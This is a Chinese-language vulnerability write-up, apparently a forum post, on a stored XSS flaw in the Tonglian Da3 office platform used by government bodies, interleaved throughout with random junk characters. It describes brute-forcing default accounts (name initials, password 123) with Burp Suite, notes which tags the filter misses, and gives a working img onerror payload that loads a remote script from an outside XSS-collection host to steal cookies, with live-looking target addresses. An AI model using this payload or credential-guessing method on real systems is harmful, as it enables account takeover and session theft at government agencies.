Z- C8 v6 J( @( P! x; q! g! N
% v; E/ a+ d/ ] 同联Da3协同办公平台后台通用储存型xss漏洞
; l: a% |$ I3 t
# P( B8 m) S, A9 V: h
. h8 a, x5 L4 i! d: w4 F; c 平台简介: \& Y: ?0 ] Q; I# [. R
4 ]4 `' D( Y7 f' u( ^: H U
) u% P u, N) ^2 q9 H+ g- s
& Y( G! s, _6 A% ?' F
% n# h6 I- q- L ! e2 H0 k, Q/ W/ N6 t7 Z1 S6 L
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
* [ v% B3 u# o: ~( C; e同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 U& i' c" \. W5 {
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
o9 }5 H0 ^$ C7 t& p
2 d5 O: A# B2 k
& T; t6 n0 d8 G1 t4 N) j* m
8 c; |' j1 ?, U+ Y+ I5 f& H) T
$ w5 l: |' T' t ) k0 F% f/ `7 `
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:' s# b3 b9 x: d5 I1 N. m; v+ [
% k6 z3 |( ~4 A/ t p$ T/ A # G4 q) F& j' N
: m) r( g; C% A/ i4 d1 l* Z
+ V! k* l0 A8 ]: ?8 N0 u ; `" v/ Z \& ?5 t: e
http://1.1.1.1:7197/cap-aco/#(案例2-)- n3 y8 J9 }9 {; m* P
+ B* t8 u7 q3 E% Z- r. M. t
B5 X0 D2 w4 u6 c6 Q
http://www.XXOO.com (案例1-官网网站)" z+ a1 }$ O. M g9 D7 J9 E; S
. z, q c! k' i% X& c
6 p# q& v3 z5 U) P 漏洞详情:
+ k0 t4 d2 X. E, E/ S |1 X/ u
4 G+ Y! ^1 X2 c; i$ @/ l3 H
; p, i" B+ M$ D
案例一、
: H4 \8 L0 ^6 H# I3 y8 O
4 {0 ]2 w/ w/ Q7 ?; }5 t
5 ~, [! N; P& W9 b9 }9 n/ u 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
' s3 E) r+ G8 m; d6 G
8 ^( @+ ^/ p- W. v
% Q4 I, r$ m! k8 U# ?0 m Z9 [ 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:& Y. M% v: |: \1 N' I6 o) C
1 @" s9 [6 U% i1 h, D- v
4 \: f% @ O! x0 D& m6 y) N
# [3 q4 g* h) P: i. t
`0 [8 B, I; S# J3 [$ x/ a
1 ]$ R' {3 x h1 x3 K1 F$ s9 u
* M$ B% O* t$ K& N* P, n5 u
n0 \0 V+ A0 w( M% M9 @0 o
( b; S+ J4 f) L$ p' j. m$ C" x
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: $ w5 E% g% _+ |- j$ E9 ^% B
) }& L3 ~ ^0 e. e+ g/ N ! f/ l5 k+ I. }7 d# K
8 \) t$ w% m" v3 g* \/ X* ?
9 e) ~+ t0 c4 H5 H. ^0 \
' S' C6 q5 n5 ~7 x
- G) H5 V7 N9 F* }& y. A
$ w- [# y: ~, ?" o+ W: c
0 j. Y; n- Y6 Z+ A' C3 F, Q 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ; G7 d% D5 }0 @& g, I# z1 I
0 Y. L, R" T1 A. A
: Y: [- T4 n: C h$ V
$ U5 T: l0 q. k' T& u
& H T h1 Q" t6 e9 E
% D/ a. C' j3 @5 Q0 r <img src=x
9 ^+ y( r! v" w( Monerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
- [ M1 m4 T, j1 }
3 ^2 z: ~ o; E1 f
! B5 o7 Q6 n! x% j8 m
4 i+ B. N. @% j0 M& Q
* L3 K; u+ M; {; L4 L
" K5 f: f% a- p1 G( V8 J' N9 f4 r 然后发送,接收cookie如图: : k, A' @& v- J2 H$ E, H
) h8 F! M4 l* v
8 Q% U9 F+ I2 v2 j% C ! W8 \( U' m# z6 b- _- a+ U3 `8 A
9 {9 b9 V* d. d, J
, h i0 a# ?, W; Z7 ?2 u
+ N+ q' _& b/ L) G" d! C& _
, ]. J( K! X( r+ g, D w
6 p. h2 f8 _9 z: L& p
+ q' L6 g5 U2 z |& z( b
5 e. X$ m. [% ]: z6 Z6 q; M , c: ]# V/ ]+ j$ ~9 X2 y" H" \! s
/ r( A* ~/ X* ?6 K
% c) Z4 a! t6 |/ z, o8 w. n( W9 W
: {; l) d8 N4 F2 Q) s- I
' ]5 d( ?8 k# S- k! U; T
; l& C# n9 S+ C& ^
, ^7 c3 F0 y5 o- ~
& B* K+ q( o* O' I7 K; M
3 `' ^8 f4 M& V& l a0 g 7 T5 R+ ~6 s7 K+ z3 N: p
. L) i7 ]1 Y; E
: A) R) ]. A) H0 M9 P3 b
1 v% C5 B6 s' D# _
案例2、 4 \4 G6 R3 U3 ^
" ?4 }5 o+ i! g8 D% g/ L3 b
* ?% X4 X/ f: Z" K3 C6 j 前面步骤都一样,下面看效果图: 3 g& W; G) A, L1 S8 X
* w- c! |8 j" N) N7 F 6 E0 _ J4 m' m6 e6 d" r
/ t( T3 w& [1 L1 ]& i
2 [5 `% s9 U. U9 j8 g
% h0 K g) L+ k+ A+ i( B% K
/ f( v; J( w+ }
9 R, n# G; G7 g, }+ r
6 R: R, {9 N: g/ N$ r' h z, \" r
9 Q6 o7 ~' o# H
/ V/ Y+ D s7 c! Z( v/ |
% r8 w$ ]4 d0 B( Z l# L
# U# J8 u1 E$ h* p
, Q' R/ j& ]7 ^9 r( ]8 | * R" Q6 W6 F6 N4 p% ?# V" e
( G+ ~" B$ O4 E
5 z/ f! ^& @$ C. g/ s- c! r 6 G7 {; s; z4 Q0 Y! T
& P7 G+ ~ } z1 S4 t
! o; P5 C: x1 m4 l3 L0 C
* a' w) Y9 i! s2 B" P5 g
7 ]. n2 W9 ^9 `6 a4 p8 N! m
- F- H; u0 T1 S, P9 r$ G * {3 ~4 S, r- e
" q( n2 F9 R$ G+ S- o7 R
7 w; }+ A; m$ k5 o, m. U $ Z1 Y/ Y* ?/ ]1 i
; e) u* V; K" e# m$ Q
8 ]3 p; D8 ^$ E6 ^" M# ?% Z6 ]